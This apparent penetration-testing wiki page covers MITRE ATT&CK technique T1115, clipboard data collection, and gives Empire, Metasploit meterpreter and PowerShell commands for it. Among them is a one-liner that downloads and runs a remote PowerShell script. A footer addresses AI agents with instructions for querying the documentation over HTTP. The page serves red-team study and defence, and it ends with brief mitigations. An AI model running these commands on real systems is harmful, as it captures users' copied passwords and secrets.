# Clipboard Data

**ATT\&CK ID:** [T1115](https://attack.mitre.org/techniques/T1115/)

**Permissions Required:** <mark style="color:green;">**User**</mark>

**Description**

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

In Windows, Applications can access clipboard data by using the Windows API.

\[[Source](https://attack.mitre.org/techniques/T1115/)]

## Techniques

### Empire

This module monitors the clipboard on a specified interval for changes to copied\
text.

```
usemodule powershell/collection/clipboard_monitor
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FB8Dbz1d0rLXMpWFimULp%2FEmpire-Clipboard.png?alt=media\&token=13243cc2-e4fa-40d8-88a9-daeebafb5ae3)

### Get-ClipboardContents

`Get-ClipboardContents` monitors for information currently in the clipboard and anything that may be copied to the clipboard for the duration of the scripts execution time.

```powershell
iex (iwr -usebasicparsing https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1);Get-ClipboardContents
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FBKbe7hJJUbZC7PZP6ti7%2FGet-ClipboardContents.png?alt=media\&token=c7aa8284-30cb-4789-b79b-06dc6d2248ae)

### Metasploit

This Metasploit module can be loaded from the meterpreter shell.

```bash
load extapi

# Read the target's current clipboard (text, files, images)
clipboard_get_data

# Dump all captured clipboard content
clipboard_monitor_dump

# Pause the active clipboard monitor
clipboard_monitor_pause

# Delete all captured clipboard content without dumping it
clipboard_monitor_purge

# Resume the paused clipboard monitor
clipboard_monitor_resume

# Start the clipboard monitor   
Start the clipboard monitor

# Stop the clipboard monitor   
clipboard_monitor_stop

# Write text to the target's clipboard    
clipboard_set_text
```

### PowerShell

The native PowerShell command `Get-Clipboard` retrieves information that is currently stored in the clipboard.

```powershell
Get-Clipboard
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fu6ZR7mY3uRqH7zAGhJoP%2FPS-Get-Clipboard.png?alt=media\&token=c9a33b45-630e-4531-b238-3889fcc0dc82)

## Mitigations

* Monitor executed commands and arguments to collect data stored in the clipboard from users copying information within or between applications.
* Monitor API calls that could collect data stored in the clipboard from users copying information within or between applications.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/collection/clipboard-data.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.